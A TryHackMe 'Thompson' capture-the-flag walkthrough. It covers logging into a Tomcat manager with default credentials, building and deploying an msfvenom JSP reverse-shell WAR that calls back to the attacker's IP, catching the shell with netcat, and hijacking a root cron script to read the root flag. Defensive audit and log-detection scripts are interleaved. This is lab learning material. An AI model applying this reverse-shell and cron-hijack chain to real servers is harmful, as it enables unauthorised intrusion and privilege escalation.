TryHackMe Thompson

Pavan Msvs
4 min read · Jun 17, 2021

Hello Everyone! Today we are going to solve the TryHackMe machine Thompson.

Firstly, connect to the THM network using the VPN and start the machine.

Start with an Nmap scan to find the open ports and the services running on the machine.

Note: If you are running as root, you don't need to use the sudo command.

nmap -Pn 10.10.195.168

Perform the more detailed scan (default scripts, version detection and OS detection) to find out the service versions running on the system.

nmap -sC -sV -A 10.10.195.168

Let's open the IP address in the browser to see what the web page shows.

Check all the pages for any useful information. If we open the manager app, it asks us for a password.

Once we click Cancel, the error page that comes back shows us the username "tomcat" and the password "s3cret".

Now, try to login with the credentials

We have successfully logged into the manager app. Inside we can see a lot of directories and information, and we can see that it lets us upload a WAR file.

Now we can upload a payload and get a reverse shell; the manager only accepts the WAR file format. Try googling the payload and see what we can find.

We found a command that generates a payload to get the reverse shell.
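The foothold here is a manager account that still uses the example credentials printed on Tomcat's own 401 page. As an added example (not code from the original post or from the Tomcat project), the script below audits a tomcat-users.xml the way a defender would: it lists every account that holds a manager or admin role and flags the ones whose password is one of the documentation examples, empty, or shorter than a locally chosen threshold. The sample XML, the MIN_PASSWORD_LENGTH value and the EXAMPLE_PASSWORDS set are my assumptions, not a Tomcat default.

```python
import xml.etree.ElementTree as ET

# Roles that grant access to the Tomcat Manager / Host Manager applications.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                 "admin-gui", "admin-script"}

# Passwords that appear in Tomcat's documentation and example configs; the
# "tomcat"/"s3cret" pair from this room is the one shown on the manager's 401 page.
EXAMPLE_PASSWORDS = {"s3cret", "tomcat", "admin", "password", "changeme", ""}

MIN_PASSWORD_LENGTH = 12  # assumption: a local policy threshold, not a Tomcat default


def audit_tomcat_users(xml_text):
    """Return a list of (username, reason) for accounts that hold a manager role
    and use an example, empty or short password."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        # ElementTree folds the xmlns into the tag name as "{ns}user"; strip it.
        if elem.tag.split("}")[-1] != "user":
            continue
        name = elem.get("username") or elem.get("name") or "<unnamed>"
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        held = sorted(roles & MANAGER_ROLES)
        if not held:
            continue  # no manager access, out of scope for this check
        if password in EXAMPLE_PASSWORDS:
            findings.append((name, "example or empty password with roles %s" % ",".join(held)))
        elif len(password) < MIN_PASSWORD_LENGTH:
            findings.append((name, "password shorter than %d characters with roles %s"
                             % (MIN_PASSWORD_LENGTH, ",".join(held))))
    return findings


# Constructed sample tomcat-users.xml for an offline run (not taken from the machine).
SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="reporting"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deployer" password="Z7q!mR3v#Ls9pWx2" roles="manager-script"/>
  <user username="reader" password="s3cret" roles="reporting"/>
</tomcat-users>
"""

if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print("FLAG %s: %s" % (user, reason))
```

Only the "tomcat" account is reported: "deployer" has a long password and "reader" has no manager role. If the server stores hashed passwords through a CredentialHandler, the digest will simply look like a long password and pass the length check, so that case needs a separate review. Beyond fixing the account, the usual hardening is to restrict the manager context to trusted addresses with a RemoteAddrValve in its context.xml.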

ifconfig tun0

The LHOST is our tun0 IP and LPORT can be any free port.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.6.93 LPORT=1234 -f war > shell.war

Now upload the shell.war file through the website; before that, note where it is being uploaded to and confirm that the upload completed successfully.

We can see that it has been uploaded under /manager and that our shell has uploaded successfully. Now, start the netcat listener on the port we chose and click on the shell file in the browser, and we successfully get our connection.

nc -nlvp 1234
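Every step of this deploy leaves a trace in Tomcat's access log: the manager login, the POST that uploads the WAR, and then the first request to a context that did not exist before. As an added example (my code, not part of the original post or of Tomcat), the detector below runs over access-log lines in the default AccessLogValve pattern and raises one alert for a successful deploy request and one for the first request, from the same client, to a context outside the stock set. The log lines, the KNOWN_CONTEXTS set and the alert shape are constructed assumptions.

```python
import re

# Common log line as Tomcat's AccessLogValve writes it with the default
# pattern "%h %l %u %t &quot;%r&quot; %s %b".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Manager endpoints that deploy an application: the HTML form used in this room
# posts to /manager/html/upload; the text/script interface uses PUT /manager/text/deploy.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")

# Contexts present on a stock install (assumption: extend with your own applications).
KNOWN_CONTEXTS = {"manager", "host-manager", "docs", "examples", "ROOT", ""}


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_war_deploys(lines):
    """Alert on successful manager deploys and on the first request to a
    non-stock context from a client that has just deployed something."""
    alerts = []
    deployed_from = set()   # client IPs that completed a deploy
    seen_contexts = set()   # contexts already reported
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        succeeded = rec["status"][0] in "23"   # 2xx, or the 3xx redirect the HTML form returns
        if rec["method"] in ("POST", "PUT") and path.startswith(DEPLOY_PATHS) and succeeded:
            alerts.append({"line": n, "kind": "manager_deploy", "ip": rec["ip"],
                           "user": rec["user"], "ts": rec["ts"]})
            deployed_from.add(rec["ip"])
            continue
        context = path.strip("/").split("/", 1)[0]
        if rec["ip"] in deployed_from and context not in KNOWN_CONTEXTS \
                and context not in seen_contexts:
            seen_contexts.add(context)
            alerts.append({"line": n, "kind": "new_context_invoked", "ip": rec["ip"],
                           "context": context, "ts": rec["ts"]})
    return alerts


# Constructed sample log, modelled on the sequence in this room (not a real capture).
SAMPLE_LOG = [
    '10.17.6.93 - - [17/Jun/2021:10:14:58 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '10.17.6.93 - tomcat [17/Jun/2021:10:15:02 +0000] "GET /manager/html HTTP/1.1" 200 19874',
    '10.17.6.93 - tomcat [17/Jun/2021:10:15:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=8A2B HTTP/1.1" 200 20311',
    '10.17.6.93 - - [17/Jun/2021:10:16:05 +0000] "GET /shell/ HTTP/1.1" 200 0',
    '10.17.6.93 - - [17/Jun/2021:10:16:06 +0000] "GET /shell/ HTTP/1.1" 200 0',
    '192.168.1.20 - - [17/Jun/2021:10:17:00 +0000] "GET /docs/ HTTP/1.1" 200 8822',
]

if __name__ == "__main__":
    for alert in detect_war_deploys(SAMPLE_LOG):
        print(alert)
```

On the sample this yields two alerts: the upload on line 3 and the first hit on /shell/ on line 4; the repeat on line 5 and the unrelated client on line 6 stay quiet. A deploy by itself is normal activity for a deployer account, so the pairing of a deploy with an immediate request to the new context from the same address is the part worth paging on.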

Check which user we are and the current working directory.

In the /home/jack folder we find our user flag. To escalate privileges and get a root shell we need to find a way up.

cat user.txt

Upgrade to an interactive TTY shell using Python so that commands behave normally and we can see everything properly.

python -c 'import pty; pty.spawn("/bin/bash")'

Now, we have seen another file, id.sh, which has full permissions for everyone. Check whether it is run regularly with root privileges: go to /etc/crontab.

cat /etc/crontab

We can see that it runs all the time, and only from the /home/jack directory. Using that, we can copy the root flag from /root/root.txt into a new file, finalflag.txt.

echo "cat /root/root.txt > finalflag.txt" > id.sh

Wait a minute for the cron job to run, and we can see our finalflag.txt file.

ls

We finally got our root flag. There are other ways to get the flag as well, but I just copied it directly from the /root directory.

cat finalflag.txt

Finally, we have successfully completed the machine.

This concludes the room and both flags have been captured!
